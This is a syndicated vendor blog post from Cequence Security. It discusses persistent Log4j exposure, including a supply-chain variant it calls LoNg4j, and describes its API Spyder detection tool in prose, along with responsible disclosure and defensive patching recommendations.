Best Practices for Addressing Log4j and LoNg4j Patching Gaps

Long after the press news and panic surrounding the discovery of Log4j, the Log4 Shell exploit and the supply-chain variant dubbed LoNg4j, IT and security teams are still struggling to adopt Log4j best practices for ensuring their servers are patched and protected. To help our customers address this critical need and improve API security, we added a Log4j detection capability to API Spyder. Any inbound DNS requests API Spyder received were time-stamped as an added datapoint. API Spyder was finding Log4j instances for our customers and they were patching them as quickly as they were found. First 12 were found, then 10, then 8, then 12 again….wait, what? It seemed something was going on.

The fluctuations in Log4j instances found was not a bug – it turned out to be something we called LoNg4J. This new Log4j variant showed that even after a globally known vulnerability has been disclosed and a patch made available, organizations are still suffering from a lack of applied patches. Best practices on capturing unpatched Log4j servers and potential LoNg4j instances are to expand the testing radius to include third-party solutions within your digital supply chain and to extend the timeframe for results to as long as 24 hours.

LoNg4J Explained

Demonstrating how connected our systems really were, LoNg4J are instances of Log4j vulnerability found upstream in your digital supply chain. One of the API Spyder detection techniques inserts a vulnerability test payload into a header. So when the initial tests were done, the transactions were logged, and the results came back negative – no Log4j. Then those logs were compiled/processed/parsed by an additional system that is vulnerable and returns the results back to API Spyder that Log4J is present.

While the news cycles around Log4j have come and gone, the vulnerability still exists. As I sit here writing this, almost a year later, our team still sees API Spyder light up with detections across our customers and prospects. In some cases, the vulnerability resides in an organization we are not engaged with yet, resulting in a responsible disclosure submission.

Learn more about API Spyder

Initial Responses to Log4j and Log4Shell Discoveries: Denial

When informed that an organization may have a vulnerability, the initial response often comes in the form of “let me see exactly how you did this.” We often get requests that challenge the validity of our claims, so we have processes in place to ensure we aren’t crying wolf. The next response is usually “we have already patched this in all of our systems” followed by “tell us how you found this.” Digging through the API Spyder data repository, I can pull out the requests and responses to illustrate what how the LoNg4j instances was found. In the most recent case we were seeing our tests generating returns from one of their vendor systems that performs an orchestration function. Denial here might be accurate, your systems aren’t impacted but, your digital supply chain may be.

This pattern of doubt or denial is common when an organization is made aware of potential vulnerability via a Responsible Disclosure. It’s important to note that if someone tries to inform you that they have found a vulnerability in your app or web site, be willing to believe it. A Responsible Disclosure notification is done with the interest of helping. There are further steps many organizations go through on this journey, but that first step of acceptance is the hardest to get over. I am not sure why.

Vulnerability management is a very difficult to execute properly. It’s a significant resource drain, requiring massive amounts of coordination to apply the simplest of patches. The initial patches and deployments are often flawed or must be applied again, and that assumes that you know which systems needs patching. Then what happens when the patch breaks something else? Now, when you consider the number of servers and resources in a large organization, you can understand why it is so hard. Keep in mind though, response to an attacker getting shell on one of your servers, with a very small script, is even harder to handle than vulnerability management. Once an attacker has access, the average time they spend on a system is over 180 days and that assumes you find them and kick them out.

Staying Ahead of Log4j and LoNg4j

The widespread use of Log4j and the vast library of internal and 3rd-party servers that organizations have deployed means that the vulnerability will be with us for years to come. Confirming this assertion, in the last six months API Spyder has found over 4,000 instances of Log4j and LoNg4j in the wild. Many of these detections have been in 3rd-party systems or buried deep in our customers supply chain. My recommendations to our customers is to remain vigilant, regardless of how successful your patching efforts may appear to be.

  • Understand your exposure: Use API testing and penetration tools to fully understand your public facing threat footprint and what your adversaries see.
  • Expand testing parameters: Include potential 3rd-party and digital supply chain including targets in your testing efforts.
  • Exercise patience: Lengthen testing timeframes to as long as 24 hours to accommodate supply chain traversal that incorporates log analysis or event correlation.
  • Track inventory and assess risks: Use visibility gained during initial analysis for continuous inventory tracking, API risk assessment and threat detection.
  • Remediate and mitigate: Patch discovered vulnerabilities quickly, block threats in real-time to prevent data loss and business disruption.

Log4j, LoNg4j and Log4Shell will not disappear anytime soon, making it imperative that all organizations are aware of the risks and are fully prepared.

Confirm your Log4j and LoNg4j patching efforts are complete with a free API Spyder assessment.

The post Best Practices for Addressing Log4j and LoNg4j Patching Gaps appeared first on Cequence Security.

*** This is a Security Bloggers Network syndicated blog from Cequence Security authored by Jason Kent. Read the original post at: